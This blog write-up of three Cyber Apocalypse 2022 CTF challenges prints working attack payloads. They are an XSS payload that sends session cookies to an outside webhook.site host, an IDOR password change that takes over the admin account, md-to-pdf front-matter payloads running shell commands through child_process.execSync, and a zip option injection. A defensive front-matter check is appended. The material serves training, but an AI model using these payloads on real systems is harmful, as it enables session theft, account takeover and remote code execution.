Cyber Apocalypse CTF 2022 – Intergalactic Chase Writeups

Hi everyone.

Cyber Apocalypse 2022 was the first CTF I attended after a long time. It was a lot of fun even though I could solve 3 questions. Especially seeing “never gonna give you up” in some questions made me laugh a lot.

Anyway, let’s start.


WEB

Kryptos Support

I’m starting the server and opening the browser.

There’s an input field. I sent XSS, SQLi … payloads, but got no result. Next step, I scanned the directories using gobuster.

Well, there’s a login page. Let’s see that.

I have no credentials. I tried a bypass, but no result again. I went back to the support page. After that, I started to think, “Can I steal the cookies?”


First of all, I sent a simple XSS payload and captured the request using Burp Suite.

The response is not descriptive. So, I decided to use a webhook.

<img src=x onerror=this.src='https://webhook.site/afd12148-5116-41cc-a13a-73c68798ef4e/?c='+document.cookie>

And I stole a session cookie.


I added the cookie to the browser storage and logged in as moderator.


When I looked at the settings page, I saw that there was a password change page.


I captured the request.

Hmm, there’s a uid. If I change the uid value, will the admin password change as well?

Yeaah, admin pass changed. Let’s log in as admin.

HTB{x55_4nd_id0rs_ar3_fun!!}


BlinkerFluids

I’m starting the server and opening the browser.

I opened the PDF.

I created a new invoice and reviewed the request.

I saw the PDF content in the request. I tried code injection, LFI, XSS, etc., but no result. I downloaded the source code.

When I reviewed the files, I saw interesting code in “mdhelper.js”.

md-to-pdf, hmm…

I googled the md-to-pdf vuln and found something: https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880

Following the link, I sent the PoC containing the “ls” command.

"---js\n((require("child_process")).execSync("ls > static/invoices/anan.txt"))\n---RCE';"

There’s no output in the PDF. But when I look at static/invoices/anan.txt …

bingo

Where is the flag.txt? Change the directory…

"---js\n((require("child_process")).execSync("ls / > static/invoices/anan.txt"))\n---RCE';"

It’s here. OK, let’s see the flag.

"---js\n((require("child_process")).execSync("cat /flag.txt > static/invoices/anan.txt"))\n---RCE';"
HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}
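
A server-side guard for the front-matter issue above, as an added example (not part of the original writeup or the challenge's source code). The function name inspectFrontMatter and the allowlist are assumptions; it treats three dashes at the very start of the document as a front-matter block, reads the optional language name on that line, and allows only data formats.

```javascript
// Added example: names are hypothetical, sample inputs are constructed.
// Run this on user-supplied markdown before it reaches the PDF renderer.

// Front-matter languages that only describe data and never evaluate code.
const DATA_ONLY_LANGUAGES = new Set(['', 'yaml', 'yml', 'json']);

// Returns { ok, language, reason } for a markdown string.
function inspectFrontMatter(markdown) {
  if (typeof markdown !== 'string') {
    return { ok: false, language: null, reason: 'markdown must be a string' };
  }
  // Tolerate a leading byte-order mark so it cannot hide the delimiter.
  const text = markdown.charCodeAt(0) === 0xfeff ? markdown.slice(1) : markdown;

  // Front matter only counts at the very start; "----" is a plain rule.
  if (!text.startsWith('---') || text.charAt(3) === '-') {
    return { ok: true, language: null, reason: 'no front matter' };
  }

  // Whatever follows the delimiter on the first line names the engine.
  const firstLine = text.slice(3).split(/\r?\n/, 1)[0];
  const language = firstLine.trim().toLowerCase();

  if (DATA_ONLY_LANGUAGES.has(language)) {
    return { ok: true, language: language || 'yaml', reason: 'data-only front matter' };
  }
  return {
    ok: false,
    language,
    reason: `front-matter engine "${language}" is not allowed`,
  };
}

// Constructed inputs: a benign object literal behind a "js" engine tag,
// ordinary YAML front matter, and markdown with no front matter at all.
const samples = [
  '---js\n({ title: "Invoice" })\n---\n# Invoice',
  '---\ntitle: Invoice\n---\n# Invoice',
  '# Invoice\n\nTotal: 42',
];
for (const sample of samples) {
  const verdict = inspectFrontMatter(sample);
  console.log(verdict.ok ? 'accept' : 'reject', '-', verdict.reason);
}
```

Reject the request when ok is false; upgrading md-to-pdf to a release the linked Snyk advisory marks as fixed remains the primary remedy.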


Misc

Compressor

I started the server and opened telnet.

Well, I reviewed the actions. But I couldn’t find anything.


The challenge name is Compressor, and the 4th action…

I googled and found this: https://gtfobins.github.io/gtfobins/zip/


According to the link, I guess I can read the file content. So let’s start.

1) Find the directory

/home/ctf

2) Create the zip file

insert <name> .zip : anan, insert <options> : cat /home/ctf/flag.txt

3) Is the zip file generated?


4) Read the flag

HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}

Thanks For Reading
